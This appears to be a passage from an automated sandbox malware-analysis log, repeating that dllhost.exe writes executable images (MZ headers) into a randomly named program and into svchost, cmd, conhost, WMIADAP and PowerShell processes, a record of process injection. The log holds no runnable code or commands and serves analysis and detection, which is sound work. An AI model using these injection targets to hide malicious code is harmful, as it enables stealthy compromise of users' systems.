Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 10E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 11E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 14B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 14B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BF59D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 253FC3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2A5AF330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 215B73E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21426A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4A4670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1780D3E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BF59D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 253FC3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2A5AF330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 215B73E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21426A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4A46A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1780D3E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 21D595A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1AD30AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 21D59C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1EA080B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085AEE0000 value starts with: 4D5A
